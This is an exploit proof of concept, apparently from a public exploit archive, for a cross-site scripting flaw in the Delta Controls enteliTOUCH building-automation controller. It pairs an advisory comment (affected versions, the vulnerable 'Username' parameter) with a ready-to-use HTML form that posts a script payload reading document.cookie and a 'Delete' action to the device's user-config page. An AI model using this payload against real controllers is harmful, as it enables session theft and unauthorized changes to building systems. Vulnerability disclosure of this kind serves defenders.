# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm

<!DOCTYPE html>
<html>
<head><title>enteliTouch XSS</title></head>
<body>
<!--

Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)


Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
                  3.40.3706
                  3.33.4005

Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.

Desc: Input passed to the POST parameter 'Username' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.

Tested on: DELTA enteliTOUCH


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5703
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php


06.04.2022

-->


<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
  <input type="hidden" name="userInfo" value="" />
  <input type="hidden" name="UL&#95;SelectedOptionId" value="" />
  <input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" />
  <input type="hidden" name="formAction" value="Delete" />
  <input type="submit" value="CSRF XSS Alert!" />
</form>

</body>
</html>